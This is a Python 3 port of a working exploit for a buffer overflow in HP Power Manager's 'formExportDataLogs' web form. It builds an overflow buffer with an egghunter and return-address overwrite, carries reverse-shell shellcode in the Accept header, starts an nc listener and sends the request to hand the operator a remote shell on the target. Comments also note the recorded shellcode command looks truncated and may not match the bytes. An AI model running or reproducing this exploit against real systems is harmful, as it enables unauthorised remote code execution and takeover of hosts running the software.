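#!/usr/bin/env python3
"""HP Power Manager 'formExportDataLogs' buffer overflow -- python3 port.

This is a python3 port / extension of the HP Power Manager 'formExportDataLogs'
Buffer Overflow script by Muhammad Haidari
(original: https://github.com/Muhammd/HP-Power-Manager).

Usage:
    python3 hp_pm_exploit_p3.py <target_ip> <target_port> <local_port>

    target_ip   : ip address the HP Power Manager is running on
    target_port : port the web application is listening on
    local_port  : port the shellcode connects back to -> the script starts an
                  ``nc`` listener on this port to catch the reverse shell

Swap out the shellcode (SHELLCODE below) for your own LHOST/LPORT.
Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate
(6.1.7600 N/A Build 7600).
Author: CountablyInfinite

Delivery layout (see build_buffer / build_request):
  * the egghunter, a NOP sled and the return-address overwrite go into the
    URL-encoded ``fileName`` form field of the POST body;
  * the real payload, prefixed with the egg ``b33fb33f``, rides in the
    ``Accept`` request header and is located in memory by the egghunter.

Changes vs. the original script:
  * the ``nc`` listener is started *before* the request is sent, so the
    connect-back cannot race a listener that is not yet bound;
  * ``sendall`` instead of ``send`` so a partial send cannot truncate the
    request; the socket is closed on every exit path;
  * non-numeric ports and a failed connect produce a message instead of a
    traceback.
"""
import subprocess
import sys
from socket import AF_INET, SOCK_STREAM, socket
from time import sleep
from urllib import parse

# Egg marker the egghunter searches for (it is written twice, "b33f" + "b33f").
EGG = b"b33fb33f"

# msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=4411 EXITFUNC=thread
#   -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed
#   --platform windows -f python
# NOTE(review): the command line above is reproduced as recorded in the original
# script; the LHOST value and the tail of the bad-character list appear truncated,
# and the bytes below do not look like alpha_mixed output -- regenerate the
# payload with your own LHOST/LPORT rather than trusting this comment.
SHELLCODE = EGG + (
    b"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
    b"\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64"
    b"\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5"
    b"\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae"
    b"\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3"
    b"\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0"
    b"\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e"
    b"\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24"
    b"\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9"
    b"\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80"
    b"\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1"
    b"\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2"
    b"\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1"
    b"\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d"
    b"\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40"
    b"\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68"
    b"\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2"
    b"\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed"
    b"\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65"
    b"\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf"
    b"\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96"
    b"\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc"
    b"\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59"
    b"\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80"
    b"\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47"
    b"\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89"
    b"\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d"
)

# egghunter.rb -f python
#   -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a'
#   -e b33f -v 'hunter'
# Classic NtAccessCheckAndAuditAlarm (int 2e) egghunter; "mov eax, 'b33f'" is
# visible in the third line, matching EGG above.
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
    b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
    b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Offset at which the egghunter (plus its sled) must end inside fileName.
HUNTER_END_OFFSET = 721
NOP_SLED_LEN = 30
# JMP SHORT 0xC2 (-62): lands back inside the NOP sled in front of the egghunter.
JMP_BACK = b"\xeb\xc2\x90\x90"
# pop esi # pop ebx # ret 10 (DevManBE.exe). Only three bytes are written; the
# fourth (high) byte is presumably supplied by the field's terminating null --
# TODO confirm against the original crash analysis.
RET_ADDR = b"\xd5\x74\x41"

FORM_TAIL = (
    "&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017"
    "&LogType=Application&actionType=1%253B"
)


def build_buffer() -> bytes:
    """Return the raw (not yet URL-encoded) contents of the ``fileName`` field.

    Layout: filler 'A's, a NOP sled ending in the egghunter at offset
    HUNTER_END_OFFSET, the short backwards jump, then the return-address
    overwrite.
    """
    filler = b"\x41" * (HUNTER_END_OFFSET - len(EGGHUNTER))
    sled = b"\x90" * NOP_SLED_LEN
    return filler + sled + EGGHUNTER + JMP_BACK + RET_ADDR


def build_request(host: str) -> bytes:
    """Build the complete HTTP/1.1 POST to /goform/formExportDataLogs.

    Args:
        host: value for the Host header and the Referer URL (no port).

    Returns:
        The request as bytes, ready for ``sendall``. The shellcode is carried
        in the Accept header; the overflow buffer is URL-encoded into the
        ``fileName`` form field.
    """
    file_name = parse.quote_plus(build_buffer())
    body = ("dataFormat=comma&exportto=file&fileName=%s" % file_name + FORM_TAIL).encode("latin1")
    host_b = host.encode("latin1")
    headers = [
        b"POST /goform/formExportDataLogs HTTP/1.1",
        b"Host: " + host_b,
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        # Raw shellcode in a header value: this is why the payload must avoid
        # CR/LF and the other bytes listed in the msfvenom command above.
        b"Accept: " + SHELLCODE,
        b"Referer: http://" + host_b + b"/Contents/exportLogs.asp?logType=Application",
        b"Content-Type: application/x-www-form-urlencoded",
        # Length of the encoded body, not of the str, so it can never drift.
        b"Content-Length: " + str(len(body)).encode("ascii"),
    ]
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def parse_args(args: list) -> tuple:
    """Parse ``argv``-style arguments into (host, port, lport).

    Exits with a usage message (SystemExit) on a wrong argument count or a
    non-numeric port.
    """
    prog = args[0] if args else "hp_pm_exploit_p3.py"
    usage = (
        "Usage: python3 %s <target_ip> <target_port> <local_port>\n"
        "Example: python3 %s 10.10.0.1 80 4411" % (prog, prog)
    )
    if len(args) != 4:
        sys.exit(usage)
    try:
        port = int(args[2])   # port the remote application is running on
        lport = int(args[3])  # port the shellcode connects back to -> listener port
    except ValueError:
        sys.exit(usage)
    return args[1], port, lport


def main() -> None:
    """Start the catch listener, deliver the overflow, then hand over to ``nc``."""
    host, port, lport = parse_args(sys.argv)
    request = build_request(host)

    print("[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit")
    print("[+] Starting local listener on port %d (nc binds on all interfaces)" % lport)
    # Listener first: the connect-back happens as soon as the egghunter finds
    # the payload, which may be before a listener started *after* the send
    # is bound. Argument list, no shell -- lport is an int anyway.
    try:
        listener = subprocess.Popen(["nc", "-nlvp", str(lport)])
    except FileNotFoundError:
        sys.exit("[-] 'nc' not found in PATH; start a listener on port %d manually" % lport)
    sleep(1)  # give nc a moment to bind before triggering the overflow
    if listener.poll() is not None:
        sys.exit("[-] listener exited early (port %d already in use?) -- exploit not sent" % lport)

    print("[+] Sending exploit to %s on port %d" % (host, port))
    try:
        with socket(AF_INET, SOCK_STREAM) as s:
            s.settimeout(10)
            s.connect((host, port))
            s.sendall(request)
            # Keep the exploit connection open while the operator uses the
            # shell through nc, as the original script did; closing it only
            # after nc returns avoids tearing down the target's request early.
            listener.wait()
    except OSError as err:
        listener.terminate()
        sys.exit("[-] failed to deliver exploit to %s:%d: %s" % (host, port, err))


if __name__ == "__main__":
    main()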